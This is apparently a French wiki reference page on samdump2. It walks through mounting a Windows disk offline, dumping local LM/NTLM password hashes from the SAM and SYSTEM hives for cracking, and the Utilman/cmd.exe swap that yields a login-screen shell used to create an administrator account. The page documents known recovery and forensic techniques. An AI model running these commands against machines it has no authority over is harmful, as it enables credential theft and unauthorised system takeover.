Samdump2
| Fiche express | |
|---|---|
| Domaine | Extraction offline de la SAM (Windows) |
| Type | Utilitaire (obsolète) |
| Voir aussi | Bkhive · SAM · NTLM |
samdump2 extrait les empreintes (hash LM/NTLM) des comptes locaux depuis la ruche SAM d'une installation Windows, une fois la clé syskey récupérée avec Bkhive. S'utilise typiquement hors-ligne, disque monté depuis un live-CD/USB Linux.
Monter la partition Windows
fdisk -l
mkdir /mnt/windows
mount -t ntfs-3g /dev/sdXN /mnt/windows -o force
Extraire les hash
bkhive /mnt/windows/Windows/System32/config/system syskey.txt
samdump2 /mnt/windows/Windows/System32/config/system /mnt/windows/Windows/System32/config/sam > hash.txt
Les hash récupérés se cassent ensuite avec John the ripper ou Hashcat.
Alternative : réinitialisation directe du mot de passe
Plutôt que casser le hash, on peut aussi remplacer le raccourci d'accessibilité Utilman par un invite de commandes, pour créer un compte administrateur directement depuis l'écran de connexion — même prérequis (disque Windows monté hors-ligne) :
cd /mnt/windows/Windows/System32
mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe
Au redémarrage, l'icône d'accessibilité de l'écran de connexion ouvre une invite de commandes système :
net user utilisateur1 /add
net user utilisateur1 MotDePasse123!
net localgroup administrateurs utilisateur1 /add
Cette technique de contournement (sticky keys/Utilman) est indépendante de samdump2 mais s'appuie sur le même prérequis d'accès physique au disque.
Voir aussi
- Bkhive — récupération préalable de la clé syskey
- SAM / LM / NTLM — formats de hash ciblés
- John the ripper — cassage des hash extraits